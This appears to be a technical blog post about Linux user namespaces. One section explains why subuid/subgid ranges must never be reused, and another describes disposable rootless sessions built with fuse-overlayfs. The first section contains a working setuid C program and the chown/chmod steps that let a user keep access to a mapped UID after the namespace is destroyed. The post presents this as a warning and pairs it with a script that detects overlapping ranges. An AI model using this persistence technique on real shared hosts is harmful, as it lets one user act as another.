SUID binaries from a user namespace

Additional IDs that are allocated to a user through /etc/subuid and /etc/subgid must be considered as permanently allocated and never reused for any other user.

Even if the container or user namespace where they are used is destroyed, it is possible to craft a SUID binary beforehand that keeps access to any ID that was mapped in the user namespace.

This simple C program is enough to keep access to a UID that was allocated to a user namespace:

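#define _GNU_SOURCE
#include <unistd.h>
#include <sys/types.h>

int main (int argc, char **argv)
{
	/* The effective UID is the owner of the setuid file.  */
	uid_t u = geteuid ();
	if (argc < 2 || setresuid (u, u, u) < 0)
		return 1;
	/* Run the given command with that UID.  */
	execvp (argv[1], argv + 1);
	return 1; /* Only reached if execvp failed.  */
}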

With that in place, from the user namespace:

$ id -u # ID 0 is mapped to ID 1000 in the host
$ gcc program.c -o keep_id
$ chown 10:10 keep_id
$ chmod +s keep_id

Even once the user namespace is destroyed, and possibly after the range of subids allocated to the user has changed, from the host we can still get access to whatever ID was mapped to user 10 in the user namespace:

$ id -u
$ ls -l keep_id
-rwsr-sr-x. 1 100009 100009 18432 Jan 10 22:23 keep_id
$ ./keep_id id -u
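
Since a binary like keep_id can outlive the namespace, a range should never be handed to a second user. As a rough aid, the sketch below reports entries whose ranges overlap in a file that uses the name:start:count format of /etc/subuid and /etc/subgid. The function name subid_overlaps is made up for this example, and the check only sees the current content of the file: it cannot tell whether a range was assigned to someone else in the past.

```shell
# Print every pair of entries whose ID ranges overlap.
# $1 is a file in the name:start:count format used by /etc/subuid.
subid_overlaps() {
    awk -F: '
        BEGIN { n = 0 }
        NF == 3 {
            # Two ranges overlap when each one starts before the other ends.
            for (i = 0; i < n; i++)
                if ($2 < start[i] + count[i] && start[i] < $2 + $3)
                    print name[i] " overlaps " $1
            name[n] = $1; start[n] = $2; count[n] = $3; n++
        }
    ' "$1"
}
```

It can be run as `subid_overlaps /etc/subuid`; no output means no two entries share an ID.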

Disposable rootless sessions

It would be nice to have a way to “fork” the current session and later revert all the changes made, without leaving anything behind on the file system.

While playing with fuse-overlayfs, a FUSE implementation of the overlay file system that is therefore usable by rootless users, I realized how easy this is to achieve: just set the overlay lowerdir to ‘/’ and use a temporary directory for the upper dir.

The upper dir, where all the overlay changes are written, can be deleted once the session is over, or reused to resume the session later.
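
The setup described above could look roughly like the following sketch. It assumes fuse-overlayfs and unshare (from util-linux) are installed; the helper names overlay_opts and disposable_session and the layout of the session directory are invented for this example. Binding /proc, /sys and /dev into the merged tree is also an assumption of the sketch, needed because lowerdir=/ covers only the root file system and not the other mounts.

```shell
# Sketch only: overlay_opts and disposable_session are hypothetical helpers.

# Build the mount options: "/" is the lower layer, all writes go to the upper dir.
overlay_opts() {
    printf 'lowerdir=/,upperdir=%s,workdir=%s' "$1" "$2"
}

# Start a shell in a session layered on top of the running system.
# $1 is a directory that will hold the upper, work and merged dirs.
disposable_session() {
    session=$1
    mkdir -p "$session/upper" "$session/work" "$session/merged" || return 1
    opts=$(overlay_opts "$session/upper" "$session/work")
    # A new user and mount namespace keeps the mount private to the session.
    unshare --user --map-root-user --mount sh -c '
        fuse-overlayfs -o "$1" "$2" || exit 1
        # lowerdir=/ does not include other mounts, so bind the usual ones
        # (an assumption of this sketch; adjust the list as needed).
        for d in proc sys dev; do
            mount --rbind "/$d" "$2/$d" || exit 1
        done
        exec chroot "$2" /bin/sh
    ' sh "$opts" "$session/merged"
}
```

Something like `disposable_session "$HOME/session1"` would start the layered shell. Deleting that directory afterwards discards the changes, while passing the same directory again should bring the session back.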

This simple setup also lets an unprivileged user install packages using the existing system as a base. With a few caveats (e.g. /var/log must be writable), I managed to run dnf and install a few packages on top of my system without needing the root user. The rest of the system didn’t notice any change, as the new files were visible only through the fuse-overlayfs mount and from the mount namespace using it.

Perhaps a tool could help manage setups like this. The biggest problem is the assumption that the lower layer won’t change, or at least not enough to break the layered session.